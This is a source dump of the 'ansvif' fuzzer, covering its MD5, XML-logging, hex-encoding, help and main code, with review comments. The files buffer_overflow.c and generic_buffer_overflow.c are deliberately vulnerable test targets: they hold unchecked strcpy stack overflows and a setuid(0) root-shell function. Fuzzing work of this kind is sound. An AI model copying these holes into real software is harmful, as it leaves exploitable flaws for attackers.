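/// into digestChars (33 bytes). Each write is bounded by the space that is
/// left in the buffer.
void writeToString()
{
  int pos ;

  for( pos = 0 ; pos < 16 ; pos++ )
    snprintf( digestChars+(pos*2), sizeof(digestChars)-(pos*2), "%02x",
              (unsigned int)digestRaw[pos] ) ;
}


public:
// an MD5 digest is a 16-byte number (32 hex digits)
BYTE digestRaw[ 16 ] ;

// This version of the digest is actually
// a "printf'd" version of the digest.
char digestChars[ 33 ] ;

/// Load a file from disk and digest it
// Digests a file and returns the result.
//
// Returns digestChars. On success it holds the 32-digit hex digest. When the
// file cannot be opened or a read error occurs, a message is printed and the
// returned string is EMPTY: the digest members are cleared first, so a caller
// can never mistake the result of an earlier call for this file's digest.
char* digestFile( char *filename )
{
  Init() ;

  // Start from "no digest" so that every failure path returns an empty string.
  memset( digestRaw, 0, sizeof (digestRaw) ) ;
  digestChars[0] = '\0' ;

  FILE *file = (filename != NULL) ? fopen (filename, "rb") : NULL ;
  if( file == NULL )
  {
    printf( "%s can't be opened\n", (filename != NULL) ? filename : "(null)" ) ;
    return digestChars ;
  }

  unsigned char buffer[1024] ;
  size_t len ;

  while( (len = fread( buffer, 1, sizeof (buffer), file )) > 0 )
    Update( buffer, (unsigned int)len ) ;

  // fread returns 0 both at end of file and on error; only the former is a
  // complete read. A digest of a truncated read would look valid, so refuse
  // to produce one.
  bool readFailed = (ferror( file ) != 0) ;
  fclose( file );

  if( readFailed )
  {
    printf( "%s can't be read\n", filename ) ;
    Init() ;
    return digestChars ;
  }

  Final();
  return digestChars ;
}

/// Digests a byte-array already in memory
// Returns digestChars: the hex digest of the first len bytes of memchunk.
// A negative len, or a null memchunk with a non-zero len, yields an empty
// string instead of being converted to a huge unsigned length.
char* digestMemory( BYTE *memchunk, int len )
{
  Init() ;

  if( len < 0 || (memchunk == NULL && len != 0) )
  {
    memset( digestRaw, 0, sizeof (digestRaw) ) ;
    digestChars[0] = '\0' ;
    return digestChars ;
  }

  if( len > 0 )
    Update( memchunk, (unsigned int)len ) ;
  Final() ;

  return digestChars ;
}

// Digests a string and prints the result.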
char* digestString( char *string )
{
  // Hashes the bytes up to (not including) the first NUL. The length comes
  // from strlen(), so `string` must be a valid NUL-terminated buffer.
  // Returns digestChars, which the next digest call on this object overwrites.
  Init() ;
  Update( (unsigned char*)string, strlen(string) ) ;
  Final() ;

  return digestChars ;
}
} ;

#endif

--------------------------------------------------------------------------------
/include/stack.h:
--------------------------------------------------------------------------------
/* ************************************************************
 * Stack.hpp
 * - safer and more convenient stack class
 * ************************************************************/
#ifndef STACK_HPP
#define STACK_HPP

#include <deque>
#include <exception>

// LIFO stack on top of std::deque. Unlike a raw deque, reading from an empty
// stack through pop() or top() throws ReadEmptyStack.
template <class T>
class stack {
protected:
  std::deque<T> c; // container for the elements

public:
  /* exception class for pop() and top() with empty stack
   */
  class ReadEmptyStack : public std::exception {
  public:
    virtual const char* what() const throw() {
      return "read empty stack";
    }
  };

  // number of elements
  typename std::deque<T>::size_type size() const {
    return c.size();
  }

  // is stack empty?
  bool empty() const {
    return c.empty();
  }

  // push element into the stack (a copy of elem is stored)
  void push (const T& elem) {
    c.push_back(elem);
  }

  // pop element out of the stack and return its value
  // throws ReadEmptyStack when the stack is empty
  T pop () {
    if (c.empty()) {
      throw ReadEmptyStack();
    }
    T elem(c.back());
    c.pop_back();
    return elem;
  }

  // return value of next element (a reference to it; nothing is removed)
  // throws ReadEmptyStack when the stack is empty
  T& top () {
    if (c.empty()) {
      throw ReadEmptyStack();
    }
    return c.back();
  }
};

#endif /* STACK_HPP */

--------------------------------------------------------------------------------
/include/xmlwriter/xml_writer.hpp:
--------------------------------------------------------------------------------
#ifndef XML_WRITER_HPP
# define XML_WRITER_HPP

# define HEADER "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
# define INDENT " "
# define NEWLINE "\n"

#include <string.h>
#ifdef __NOTANDROID__
#include "include/stack.h"
#endif
#ifdef __ANDROID__
#include "../stack.h"
#endif
#ifdef __WIN32
#include "../stack.h"
#endif
#include <iostream>

// Minimal streaming XML writer. Calls chain: openElt().attr().content().closeElt().
//
// What is and is not escaped:
//   - attribute VALUES and element CONTENT go through write_escape();
//   - element NAMES (openElt) and attribute KEYS (attr) are written verbatim,
//     so callers must pass valid XML names themselves.
// The writer does not check call order; attr() is only meaningful between
// openElt() and the next content()/openElt()/closeElt().
class Writer
{
public:

  // Binds the writer to `os` (held by reference, so the stream must outlive
  // the writer) and immediately writes the XML declaration.
  Writer(std::ostream& os) : os(os), tag_open(false), new_line(true) {os << HEADER;}
  // Does not close elements that are still open; call closeAll() for that.
  ~Writer() {}

  // Starts a new element nested inside the currently open one.
  Writer& openElt(const char* tag) {
    this->closeTag();
    if (elt_stack.size() > 0)
      os << NEWLINE;
    this->indent();
    this->os << "<" << tag;
    elt_stack.push(tag);
    tag_open = true;
    new_line = false;
    return *this;
  }

  // Closes the innermost open element. With no element open, elt_stack.top()
  // throws stack<std::string>::ReadEmptyStack.
  Writer& closeElt() {
    this->closeTag();
    std::string elt = elt_stack.top();
    this->elt_stack.pop();
    if (new_line)
    {
      os << NEWLINE;
      this->indent();
    }
    new_line = true;
    this->os << "</" << elt << ">";
    return *this;
  }

  // Closes every element that is still open, innermost first.
  Writer& closeAll() {
    while (elt_stack.size())
      this->closeElt();
    return *this;
  }

  // Adds key="val" to the start tag being written; only val is escaped.
  Writer& attr(const char* key, const char* val) {
    this->os << " " << key << "=\"";
    this->write_escape(val);
    this->os << "\"";
    return *this;
  }

  Writer& attr(const char* key, std::string val) {
    return attr(key, val.c_str());
  }

  // Writes escaped character data into the current element. The value is a
  // C string, so output stops at the first NUL byte.
  Writer& content(const char* val) {
    this->closeTag();
    this->write_escape(val);
    return *this;
  }

private:
  std::ostream& os;
  bool tag_open;   // a start tag has been begun and its '>' is still pending
  bool new_line;   // the next closing tag goes on its own indented line
  stack<std::string> elt_stack;  // names of the currently open elements

  // Emits the pending '>' of a start tag, if any.
  inline void closeTag() {
    if (tag_open)
    {
      this->os << ">";
      tag_open = false;
    }
  }

  // Writes one INDENT per currently open element.
  inline void indent() {
    int elt_stack_size = elt_stack.size();
    for (int i = 0; i < elt_stack_size; i++)
      os << (INDENT);
  }

  // Replaces the five XML special characters with entity references and
  // copies every other byte unchanged.
  // NOTE(review): control bytes and bytes that are not valid UTF-8 are passed
  // through as they are. The header declares utf-8 and XML 1.0 forbids most
  // control characters, so a value holding such bytes yields a document that
  // strict XML parsers reject. Values written here should be restricted or
  // encoded by the caller when the log has to be machine-readable.
  inline void write_escape(const char* str) {
    for (; *str; str++)
      switch (*str) {
        case '&': os << "&amp;"; break;
        case '<': os << "&lt;"; break;
        case '>': os << "&gt;"; break;
        case '\'': os << "&apos;"; break;
        case '"': os << "&quot;"; break;
        default: os.put(*str); break;
      }
  }
};

#endif /* !XML_WRITER_HPP */

--------------------------------------------------------------------------------
/make_win.bat:
--------------------------------------------------------------------------------
@echo off
FOR /F "tokens=* USEBACKQ" %%F IN (`dir "C:\Program Files\mingw-w64\*posix-seh*" /b /S`) DO (
SET mingw=%%F
)
set PATH=%mingw%\mingw64\bin;%PATH%
rem echo %PATH%
@echo on
"windres.exe" bin\win\metadata.rc -O coff -o metadata.res
"g++.exe" src/remove_chars.cpp src/bin2hex.cpp src/write_file.cpp src/popen2.cpp src/main.cpp src/help.cpp src/file_check.cpp src/to_int.cpp src/match_fault.cpp src/sys_string.cpp src/man_read.cpp src/randomizer.cpp src/trash.cpp src/templates.cpp src/reaper.cpp src/log.cpp metadata.res src/version.h -I./ -I./include -std=c++11 -lstdc++ -lpthread -O2 -o ansvif.exe -static -static-libgcc -static-libstdc++
"gcc.exe" src/win/printf.c -o printf.exe metadata.res

--------------------------------------------------------------------------------
/man/ansvif.1.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/man/ansvif.1.gz

--------------------------------------------------------------------------------
/man/ansvif_gtk.1.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/man/ansvif_gtk.1.gz

--------------------------------------------------------------------------------
/man/find_suid.1.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/man/find_suid.1.gz

--------------------------------------------------------------------------------
/src/.deps/.dirstamp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/src/.deps/.dirstamp

--------------------------------------------------------------------------------
/src/.dirstamp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/src/.dirstamp

--------------------------------------------------------------------------------
/src/bin2hex.cpp:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 */

// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)

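#include <iomanip>
#include <iterator>
#include <sstream>
#include <string>

/* Append every byte of bin_str to hex_out as exactly two upper-case hex
 * digits followed by delim.
 *
 * Two details matter for the encoding to be right:
 *  - std::setw() only applies to the next insertion, so it is repeated for
 *    every byte; setting it once pads the first byte only;
 *  - each byte is converted through unsigned char first. Where plain char is
 *    signed, a byte >= 0x80 converted directly to an integer is sign-extended
 *    and would print as eight hex digits instead of two.
 */
static void append_hex_bytes(std::stringstream &hex_out,
                             const std::string &bin_str, const char *delim) {
  hex_out << std::setfill('0') << std::hex << std::uppercase;
  for (std::string::const_iterator it = bin_str.begin(); it != bin_str.end();
       ++it) {
    hex_out << std::setw(2)
            << static_cast<unsigned int>(static_cast<unsigned char>(*it))
            << delim;
  }
}

/* Encode bin_str as backslash-x hex for later expansion by printf.
 *
 * Windows: the result is "\x" + (HH + "\x" per byte) + "20", i.e. a trailing
 *          encoded space completes the last delimiter; an input consisting of
 *          one space ("\x20\x20") yields "".
 * Linux:   the result is HH + "\\x" per byte (doubled backslash, delimiter
 *          AFTER each byte, nothing in front of the first one).
 * Other platforms: "".
 */
std::string binstr_to_hex(std::string bin_str) {
  std::stringstream hex_out;
#ifdef _WIN32
  std::string hexxy;
  append_hex_bytes(hex_out, bin_str, "\\x");
  if (hex_out.str() != "") {
    /* at least one byte was written: finish the dangling delimiter
     * with an encoded space
     */
    hexxy = hex_out.str() + "20";
  }
  hexxy = "\\x" + hexxy;
  if (hexxy == "\\x20\\x20") {
    return "";
  } else {
    /* return to be fed into printf */
    return (hexxy);
  }
#endif
#ifdef __linux
  append_hex_bytes(hex_out, bin_str, "\\\\x");
  /* return to sys_string in hex */
  return (hex_out.str());
#endif
  /* neither platform macro is defined: return a value instead of falling
   * off the end of a non-void function
   */
  return ("");
}

/* Encode bin_str as %HH pairs: "%" + (HH + "%" per byte) + "20". For empty
 * input the result is a lone "%". On Windows an input consisting of one
 * space ("%20%20") yields "". Other platforms: "".
 */
std::string binstr_to_hex_pc(std::string bin_str) {
  /* initialize the hex to go out */
  std::stringstream hex_out;
  std::string hexxy;
#ifdef _WIN32
  append_hex_bytes(hex_out, bin_str, "%");
  if (hex_out.str() != "") {
    hexxy = hex_out.str() + "20";
  }
  hexxy = "%" + hexxy;
  if (hexxy == "%20%20") {
    return ("");
  } else {
    /* return the hex */
    return (hexxy);
  }
#endif
#ifdef __linux
  append_hex_bytes(hex_out, bin_str, "%");
  if (hex_out.str() != "") {
    hexxy = hex_out.str() + "20";
  }
  /* make sure it starts with a % in this case */
  hexxy = "%" + hexxy;
  /* return sys_string in hex */
  return (hexxy);
#endif
  return ("");
}

--------------------------------------------------------------------------------
/src/buffer_overflow.c:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 *
 *
 * __ _ _ __ ___ __ ____ ____
 * / ( \/ )/ _\ / __)/ _\/ ___(_ _)
 * ( O ) (/ ( (_ / \___ \ )(
 * \__(_/\_\_/\_/\___\_/\_(____/(__)
 */

/* NOTE(review): this program looks like a deliberately faulty target for
 * exercising the fuzzer, not production code. The unchecked copy in func()
 * is therefore left as it is. It should only be built and run in a throwaway
 * test environment and must never be installed setuid or shipped alongside
 * the tool's real binaries.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
/* NOTE(review): setuid() is called below but <unistd.h> is not included, so
 * the call relies on an implicit declaration that current C compilers reject.
 */

/* Copies argv[2] into a 16-byte stack buffer with no length check: any
 * argument longer than 15 characters writes past the end of arr.
 */
void func(char **argv) {
  printf("running strcpy...\n");
  char arr[16];
  strcpy(arr, argv[2]);
  return;
}

/* Sets the user id to 0 and starts a shell. main() only calls this when
 * blah == 1, and nothing in main() ever assigns blah after initialising it
 * to 0, so this path is not reachable through normal control flow.
 */
void spawnme() {
  setuid(0);
  int stat = system("/bin/sh");
}

/* Requires exactly two arguments; the second one is passed to func().
 * Every path ends in exit(1).
 */
int main(int argc, char *argv[]) {
  int blah = 0;
  if (argc != 3) {
    printf("2 args yo.\n");
    exit(1);
  }
  if (argc == 3) {
    func(argv);
  }
  if (blah == 1)
    spawnme();
  else
    printf("wut?\n");
  exit(1);
}

--------------------------------------------------------------------------------
/src/file_check.cpp:
--------------------------------------------------------------------------------
#include <string>
#include <sys/stat.h>

/* Returns true when stat() succeeds on filen. A false result means stat()
 * failed for any reason (missing file, but also e.g. a path component that
 * cannot be searched). The answer describes the moment of the call only; code
 * that opens the file afterwards still has to handle the open failing.
 */
bool file_exists(const std::string &filen) {
  struct stat buf;
  /* return if the file exists or not */
  return (stat(filen.c_str(), &buf) == 0);
}


--------------------------------------------------------------------------------
/src/generic_buffer_overflow.c:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 *
 *
 * __ _ _ __ ___ __ ____ ____
 * / ( \/ )/ _\ / __)/ _\/ ___(_ _)
 * ( O ) (/ ( (_ / \___ \ )(
 * \__(_/\_\_/\_/\___\_/\_(____/(__)
 */

/* NOTE(review): like buffer_overflow.c, this appears to be an intentionally
 * faulty fuzzing target; keep it out of anything that is installed or run
 * with privileges.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

/* Copies argv[1] into a 16-byte stack buffer with no length check. */
void func(char **argv) {
  printf("running strcpy...\n");
  char arr[16];
  strcpy(arr, argv[1]);
}

/* Calls func() only when exactly one argument is given; always returns 0. */
int main(int argc, char *argv[]) {
  if(argc == 2) {
    func(argv);
  }
  return(0);
}

--------------------------------------------------------------------------------
/src/help.cpp:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 */

// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)

#ifdef __NOTANDROID__
#include "src/version.h"
#ifdef __ANDROID__
#include "../version.h"
#endif
#endif
#ifdef _WIN32
#include "version.h"
#endif
#include <cstdlib>
#include <iostream>
#include <stdio.h>
#include <string>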
#include "version.h"

/* Print the usage text to stdout and terminate the process with status 1.
 * mr_me is the program name shown in the usage line; `ver` is the version
 * string, defined outside this file. This function never returns.
 */
void help_me(std::string mr_me) {
  /* print all the help shit to STDOUT */
  /* NOTE(review): the "-s" text below contains \[ \( and \{, which are not
   * standard C++ escape sequences; compilers typically warn and keep the
   * bare character.
   */
  std::cout
      << "ansvif v" << ver << " -- A Not So Very Intelligent Fuzzer"
      << std::endl
      << "Usage:" << std::endl
      << " " << mr_me << " -t template -c ./faulty -b 2048" << std::endl
      << "Options:" << std::endl
      << " -t [file] This file should hold line by line command arguments."
      << std::endl
      << " as shown in the example file." << std::endl
      << " -e [file] This file should hold line by line environment "
         "variables."
      << std::endl
      << " as shown in the example file. You can" << std::endl
      << " usually get these by doing something like:" << std::endl
      << " $ strings /bin/mount | perl -ne 'print if /[A-Z]=$/' > "
         "mount_envs"
      << std::endl
      << " -c [path] Specifies the command path." << std::endl
#ifdef __linux
      << " -p [integer] Specifies the manpage location (as an integer, usually "
         "1 or 8)."
      << std::endl
      << " -m [command] Specifies the commands manpage." << std::endl
#endif
      << " -D Dump what we can out of the manpage to stdout."
      << std::endl
      << " -f [integer] Number of threads to use. Default is 2." << std::endl
      << " -b [integer] Specifies the buffer size to fuzz with." << std::endl
      << " 256-2048 Is usually sufficient." << std::endl
      << " -r Use only random data." << std::endl
      << " -z Randomize buffer size from 1 to specified by the -b "
         "option."
      << std::endl
      << " -s \"@#^$CE\" Characters to omit from randomization. Default "
         "omitted"
      << std::endl
      << " characters are: <>\\n |&\[]\()\{}:;\\ and mandatory "
         "omitted"
      << std::endl
      << " characters are: >\\n."
      << std::endl
      << " -o [file] Log to this file." << std::endl
      << " -x [file] Other opts to put in, such as usernames, etc."
      << std::endl
      << " -S \",\" Some seperator besides 'space' between opts, such as "
         "',:-' etc."
      << std::endl
      << " -L Privilege changing not implimented in Windows yet. "
         "Defaults"
      << std::endl
      << " nobody." << std::endl
      << " -A \"foo\" Always put this string after the command."
      << std::endl
      << " -B \"bar\" Always put this string before the command."
      << std::endl
      << " -F [file] A file with junk to be fuzzed with whole." << std::endl
      << " -n Never use random data in the fuzz." << std::endl
      << " -C \"13\" Non default crash recognition error codes."
      << std::endl
#ifdef _WIN32
      << " Defaults are -1073741819, -1073740791, -1073741571, and"
      << std::endl
      << " -532459699."
#endif
#ifdef __linux
      << " Defaults are 132, 136, 139, 135, 134, and 159."
#endif
      << std::endl
      << " -W [integer] Thread timeout." << std::endl
#ifdef _WIN32
      << " -V Valgrind is not supported under Windows." << std::endl
#endif
#ifdef __linux
      << " -V Fuzz in conjunction with Valgrind." << std::endl
#endif
      << " -1 Try to induce a crash once, and if a crash is not "
         "induced,"
      << std::endl
      << " throw error code 64." << std::endl
      << " -P Use % to represent binary in fuzz." << std::endl
      << " -M Max arguments to use in the fuzz." << std::endl
      << " -y Short for -b 0 and usually only useful with -A or -B"
      << std::endl
      << " -K Keep going after a crash." << std::endl
      << " -E \"cmd\" A command to be run before the fuzzed program." << std::endl
      << " -R \"ls\" Always run this command after the fuzz." << std::endl
      << " -N \"prog\" Shorthand for -R \"pkill prog\"" << std::endl
      << " -0 No NULL in fuzz." << std::endl
      << " -v Be verbose." << std::endl
      << " -d Debug data." << std::endl
      << " -i Prints version information." << std::endl;
  /* exit with an error because we didn't do anything but
   * print a help page
   */
  exit(1);
}

--------------------------------------------------------------------------------
/src/linux/.deps/.dirstamp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/src/linux/.deps/.dirstamp

--------------------------------------------------------------------------------
/src/linux/.dirstamp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/src/linux/.dirstamp

--------------------------------------------------------------------------------
/src/log.cpp:
--------------------------------------------------------------------------------
#ifdef __NOTANDROID__
#include "src/version.h"
#endif
#ifdef __ANDROID__
#include "version.h"
#endif
#ifdef _WIN32
#include "version.h"
#endif
#ifdef __linux__
#include "version.h"
#endif
#include "../include/stack.h"
#include "../include/xmlwriter/xml_writer.hpp"
#include <cstdlib>
#include <cstring>
#include <fstream>
#include <sstream>
#include <iostream>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Write the opening part of the crash log: an <ansvif> element with the
 * tool version, the fuzzed program's path and (on unix) the process id.
 * Output goes to write_file_n + ".crash.ansvif.log". cmd_output, out_str_p
 * and out_str are accepted but not used here.
 *
 * NOTE(review): the <ansvif> element opened here is never closed in this
 * function, and the stream is opened in the default mode, which truncates.
 * log_tail() opens the same path the same way, so what is written here does
 * not appear to survive a later log_tail() call -- confirm and decide
 * whether one function should own the file.
 */
void log_head(std::string write_file_n, std::string path_str,
              std::string cmd_output, std::string out_str_p,
              std::string out_str, int pid) {
/* all this xml stuff is for logging */
#ifdef __unix__
  std::ostringstream pid_as_s;
  pid_as_s << pid;
  /* the two names below are built but not used in this function */
  std::string output_logfile_pid =
      write_file_n + ".output." + pid_as_s.str().c_str() + ".ansvif.log";
  std::string crash_logfile_pid =
      write_file_n + ".crash." + pid_as_s.str().c_str() + ".ansvif.log";

#endif
  std::ofstream xml_output;
  xml_output.open(write_file_n + ".crash.ansvif.log");
  Writer writer(xml_output);
  writer.openElt("ansvif");
  writer.openElt("Version")
      .attr("ver", "The ansvif version to fuzzing with")
      .content(ver.c_str())
      .closeElt();
  writer.openElt("Program")
      .attr("path", "Path of the file fuzzed")
      .content(path_str.c_str())
      .closeElt();
#ifdef __unix__
  writer.openElt("Process")
      .attr("PID", "The process ID of the crashed program")
      .content(pid_as_s.str().c_str())
      .closeElt();
  ;
#endif
}

/* Write the crash details (exit code, the command line in both encodings and
 * the junk file name) to write_file_n + ".crash.ansvif.log", print
 * "Crash logged.", and on unix rename output_logfile / crash_logfile to names
 * that carry the pid.
 *
 * NOTE(review):
 *  - "Exit Code" and "File data" contain a space. Writer::openElt() writes
 *    the name verbatim, and a space is not allowed in an XML element name,
 *    so strict parsers will reject this file.
 *  - out_str / out_str_p carry fuzz input. Writer escapes only & < > ' and ",
 *    so other bytes reach the file unchanged, and content() stops at the
 *    first NUL. Treat this log as untrusted data when viewing or parsing it.
 *  - the return values of rename() are ignored, so a failed move is silent.
 */
void log_tail(std::string write_file_n, std::string junk_file_of_args,
              std::string output_logfile, std::string crash_logfile,
              std::string cmd_output, std::string out_str_p,
              std::string out_str, int pid) {
/* since we crashed we're going to finish writing to the
 *xml file
 */
#ifdef __unix__
  std::ostringstream pid_as_s;
  pid_as_s << pid;
  std::string output_logfile_pid =
      write_file_n + ".output." + pid_as_s.str().c_str() + ".ansvif.log";
  std::string crash_logfile_pid =
      write_file_n + ".crash." + pid_as_s.str().c_str() + ".ansvif.log";
#endif
  std::ofstream xml_output;
  xml_output.open(write_file_n + ".crash.ansvif.log");
  Writer writer(xml_output);
  writer.openElt("Crash");
  writer.openElt("Exit Code")
      .attr("code", "The programs exit code")
      .content(cmd_output.c_str())
      .closeElt();
  writer.openElt("Command")
      .attr("run", "What the command crashed with")
      .content(out_str_p.c_str())
      .closeElt();
  writer.openElt("Command")
      .attr("run_plain", "What the command crashed with (plaintext)")
      .content(out_str.c_str())
      .closeElt();
  writer.openElt("File data")
      .attr("file", "File data used left here")
      .content(junk_file_of_args.c_str())
      .closeAll();
  xml_output.close();
  std::cout << "Crash logged." << std::endl;
/* move the logged files for pid */
#ifdef __unix__
  rename(output_logfile.c_str(), output_logfile_pid.c_str());
  rename(crash_logfile.c_str(), crash_logfile_pid.c_str());
#endif
}

/* Record the command line a run hung with. On unix the file is
 * write_file_n + ".output." + pid + ".ansvif.log"; on Windows the name is
 * built from ".output." directly followed by ".ansvif.log", with no pid.
 * When neither platform macro is defined the stream is never opened.
 *
 * NOTE(review): the three elements are written side by side with no
 * enclosing element, and "File data" contains a space, so the output is not
 * a well-formed XML document.
 */
void log_hang(std::string write_file_n, std::string out_str_p,
              std::string out_str, std::string junk_file_of_args, int pid) {
#ifdef __unix__
  std::ostringstream pid_as_s;
  pid_as_s << pid;
  std::string output_logfile_pid =
      write_file_n + ".output." + pid_as_s.str().c_str() + ".ansvif.log";
#endif
  std::ofstream xml_output;
#ifdef __unix__
  xml_output.open(output_logfile_pid.c_str());
#endif
#ifdef _WIN32
  std::string output_logfile =
      write_file_n + ".output." + ".ansvif.log";
  xml_output.open(output_logfile.c_str());
#endif
  Writer writer(xml_output);
  writer.openElt("Command")
      .attr("run", "What the command hung with")
      .content(out_str_p.c_str())
      .closeElt();
  writer.openElt("Command")
      .attr("run_plain", "What the command hung with (plaintext)")
      .content(out_str.c_str())
      .closeElt();
  writer.openElt("File data")
      .attr("file", "File data used left here")
      .content(junk_file_of_args.c_str())
      .closeAll();
  xml_output.close();
}

--------------------------------------------------------------------------------
/src/main.cpp:
--------------------------------------------------------------------------------
/*
 * ansvif
 * A Not So Very Intelligent Fuzzer
 * Marshall Whittaker / oxagast
 */

// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)

#include <cstdlib>
#include <fstream>
#include <iostream>
#include <regex>
#include "signal.h"
#include "stdio.h"
#include "sys/stat.h"
#ifdef __unix__
#include <sys/wait.h>
#endif
#ifdef __ANDROID__
#include "version.h"
#endif
#ifdef __NOTANDROID__
#include "src/version.h"
#endif
#ifdef _WIN32
#include "version.h"
#endif
#include "sys/types.h"
#include <thread>
#include "unistd.h"
#include <vector>

/* functions implemented in the project's other source files */
int toint(std::string ints, std::string my_prog);
void help_me(std::string mr_me);
bool file_exists(const std::string &filen);
std::vector<std::string> get_flags_man(std::string man_page,
                                       std::string man_loc, bool verbose,
                                       bool debug, bool dump_opts);
void oxagast();

/* fuzzing options; the single global instance is named `options` */
struct Options {
public:
  int static_args;
  std::vector<std::string> opts;
  std::vector<std::string> spec_env;
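std::vector<std::string> opt_other; 50 | std::string t_timeout; 51 | std::string strip_shell; 52 | std::string u_strip_shell; 53 | std::string write_file_n; 54 | std::string path_str; 55 | std::string other_sep; 56 | std::string low_lvl_user; 57 | std::string junk_file_of_args; 58 | std::string always_arg_before; 59 | std::string always_arg_after; 60 | std::string fault_code; 61 | bool rand_all; 62 | bool never_rand; 63 | bool valgrind; 64 | bool percent_sign; 65 | } options;

/* -v / -d / -D switches */
struct Debug {
public:
  bool debug;
  bool verbose;
  bool dump_opts;
} debugo;

/* buffer size (-b, or 0 with -y) and the -z random-size switch */
struct BuffCont {
public:
  int buf_size_int;
  bool rand_buf;
} buffercontrol;

/* -R, -E, -N and -w */
struct RunCommands {
public:
  std::string run_command;
  std::string before_command;
  std::string prog_name;
  bool write_pipe;
} runcoms;

/* -K (keep going) and -1 (single try) */
struct Monopoly {
public:
  bool keep_going;
  bool single_try;
} dontpassgo;

void match_seg(Options, RunCommands, Monopoly, BuffCont, Debug);
std::vector<std::string> get_flags_template(std::string filename, bool verbose,
                                            bool debug);
std::vector<std::string> get_other(std::string filename, bool verbose,
                                   bool debug);
void write_seg(std::string filename, std::string seg_line);

/* globals to be passed to sig_handler because its easier this way */
std::string write_file_n, junk_file_of_args;
std::string ver = "1.11"; /* ansvif version */

/*
 * SIGINT handler: print a notice, remove the junk file and the two
 * generic log files, then exit(0).
 *
 * NOTE(review): nothing in this file assigns the globals write_file_n and
 * junk_file_of_args; main() fills its local options.write_file_n and
 * options.junk_file_of_args instead. Unless another translation unit sets
 * them, the paths unlinked here are "", ".crash.ansvif.log" and
 * ".output.ansvif.log" relative to the current directory -- confirm.
 * NOTE(review): std::cout and exit() are not async-signal-safe; the
 * handler can deadlock or corrupt stream state if the signal arrives
 * while another thread is inside iostream or the allocator.
 */
void sig_handler(int sig) {
  /* flush the screen buffer then sleep before printing
   * the message about killing threads
   */
  std::cout.flush();
  sleep(1);
  std::cout << std::endl << "Cought ctrl+c, Killing threads..." << std::endl;
  std::cout << "Cleaning up..." << std::endl;
  /* names of the generic logs, removed so an interrupted run leaves
   * nothing behind
   */
  std::string crash_file = write_file_n + ".crash.ansvif.log";
  std::string output_file = write_file_n + ".output.ansvif.log";
  unlink(junk_file_of_args.c_str());
  unlink(crash_file.c_str());
  unlink(output_file.c_str());
  std::cout << "Exiting cleanly..." << std::endl;
  exit(0);
}

/* -i: print the version banner and exit */
void version() {
  std::cout << "ansvif v" << ver << " -- A Not So Very Intelligent Fuzzer"
            << std::endl;
  exit(0);
}

/*
 * Entry point: set defaults, parse the command line, load the option list
 * from a manpage (-m/-p) or a template (-t), validate the buffer size and
 * thread count, then run match_seg once (-1) or on a pool of threads.
 */
int main(int argc, char *argv[]) {
  int opt;
  int thread_count_def = 2;

  /* this local shadows the global `options` declared with the struct */
  Options options = {
    static_args : 4,
    opts : {},
    spec_env : {},
    opt_other : {},
    t_timeout : "3",
#ifdef __NOTANDROID__
    strip_shell : "\"`<>\n|&\[]\()\{}:;$'",
#endif
#ifdef _WIN32
    strip_shell : "[]:|<>+;=.?\n\r\\0",
#endif
#ifdef __ANDROID__
    strip_shell : "\"`<>\n|&\[]\()\{}:;$'",
#endif
    u_strip_shell : "",
    write_file_n : "",
    path_str : "",
    other_sep : "",
    low_lvl_user : "nobody",
    junk_file_of_args : "",
    always_arg_before : "",
    always_arg_after : "",
#ifdef __NOTANDROID__
    fault_code : "134",
#endif
#ifdef __ANDROID__
    fault_code : "134",
#endif
#ifdef _WIN32
    fault_code : "-1073741819",
#endif
    rand_all : false,
    never_rand : false,
    valgrind : false,
    percent_sign : false,
  };

  Debug debugo {
    debug : false,
    verbose : false,
    dump_opts : false
  };

  BuffCont buffercontrol {
    buf_size_int : -1,
    rand_buf : false
  };

  Monopoly dontpassgo {
    keep_going : false,
    single_try : false
  };

  RunCommands runcoms { // I always wanted a fucking monocole.
    run_command : "",
    before_command : "",
    prog_name : ""
  };

  /* install the ctrl+c handler before anything creates files */
  signal(SIGINT, sig_handler);
  std::string buf_size, template_file, man_loc, man_page, num_threads;
  /* now we can start grabbing all the options! */
  while ((opt = getopt(
              argc, argv,
              "m:p:t:e:c:f:o:b:s:x:R:A:F:E:S:L:W:B:M:C:N:way1hrzvdDnVPKi0")) !=
         -1) {
    switch (opt) {
    case 'v':
      debugo.verbose = true;
      break;
    case 'd':
      debugo.debug = true;
      debugo.verbose = true;
      break;
    case 't':
      template_file = optarg;
      break;
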